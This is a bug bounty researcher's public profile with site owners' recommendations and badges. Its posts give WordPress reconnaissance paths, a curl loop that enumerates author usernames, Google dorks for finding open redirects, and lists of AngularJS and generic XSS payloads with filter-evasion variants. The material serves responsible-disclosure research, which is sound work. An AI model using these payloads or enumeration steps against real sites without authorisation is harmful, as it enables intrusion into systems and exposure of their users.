My Profile | MiguelSantareno
Public work and profiles: https://miguelsantareno.github.io/ https://hackerone.com/miguel_santareno https://www.intigriti.com/profile/miguelsantareno https://yeswehack.com/hunters/miguelsantareno https://bugcrowd.com/MiguelSantareno
Recommendations and Acknowledgements
Miguel Santareno made us aware of several security vulnerabilities across several sections of our platform needed to be rectified due to them being a security risk. It was a pleasure working with him and I hope we can work again in the future, Thank you! |
Thanks to Miguel that reported a XSS vulnerability in one of our websites. Excellent service. The problem is now solved and tested. Great help, Many thanks |
Miguel showed us several information disclosure issues with our site. Thank you very much Miguel! |
Miguel helped us to identify several bugs in our wordpress instances. His reports were sufficiently detailed and communication was flawless and fast. Thank you very much! |
Miguel found a important security issue in our webpage and send us very good information about solutions. Thanks a lot. |
Miguel found a issue in our wordpress site and was quick to report it. Thank you |
Miguel has found a XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you! |
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue and his very helpful steps to reproduce were appreciated. Very helpful and friendly. |
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks. |
Identified an XSS vulnerability in one website and show us where is it. After that made changes in code to solve it All solved. Great help, great support. |
Shows the first 10 recommendations. See all.
Honor Badges
Number of Secured Websites
|
|
|
|
10+ Websites
|
50+ Websites
|
500+ Websites
|
WEB SECURITY VETERAN
1000+ Websites
|
Advanced Security Research
|
|
|
|
WAF Bypasser
|
CSRF Master
30+ Reports
|
AppSec Logic Master
30+ Reports
|
Fastest Fix
Fix in 24 hours
|
Outstanding Achievements
|
|
|
|
Secured OBB
|
OBB Advocate
|
Improved OBB
|
Commitment to Remediate and Patch
|
|
|
|
Patch Master
55% Patched
|
Patch Guru
65% Patched
|
Patch Lord
75% Patched
|
Recommendations and Recognition
|
|
|
|
REPUTABLE
10+ Recommends
|
FAMOUS
25+ Recommends
|
GLOBALLY TRUSTED
50+ Recommends
|
Distinguished Blog Author
|
|
|
|
1 Post
|
3 Posts
|
5+ Posts
|
Research Statistics
Total reports: | 1450 |
Total reports on VIP sites: | 97 |
Total patched vulnerabilities: | 1142 |
Recommendations received: | 20 |
Active since: | 20.06.2017 |
05.09.2019 Wordpress basic auditing
Wordpress Read me
target/readme.html
Wordpress License with wordpress version
target/license.txt
Wordpress sample config:
target/wp-config-sample.php
Wordpress installation:
target/wp-admin/install.php
Wordpress upgrade file:
target/wp-admin/upgrade.php
Wordpress setup config:
target/wp-admin/setup-config.php
Wordpress Api usefull paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - wordpress api
Script to enumerate users thought authors of blog:
for i in {1..30}; do curl -s -L -i target | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z-.]|Location:." | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done
Wordpress Plugins readme or license:
target/wp-content/plugins/plugin name/readme.txt or /license.txt
Wordpress Theme readme or license:
target/wp-content/theme/nome-do-theme/readme.txt, /changeglog.txt or /license.txt
05.09.2019 Payloads for all type off web attacks
02.04.2019 Google Dorks to find open redirects:
inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https
02.04.2019 Cross Site Script angular payloads:
1.0.1 - 1.1.5
Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
Jan Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
30.03.2019 List off basic Cross site script playloads
"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")>
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt
'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script>
><script>alert`1`</script>
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>
Please login via Twitter to add a recommendation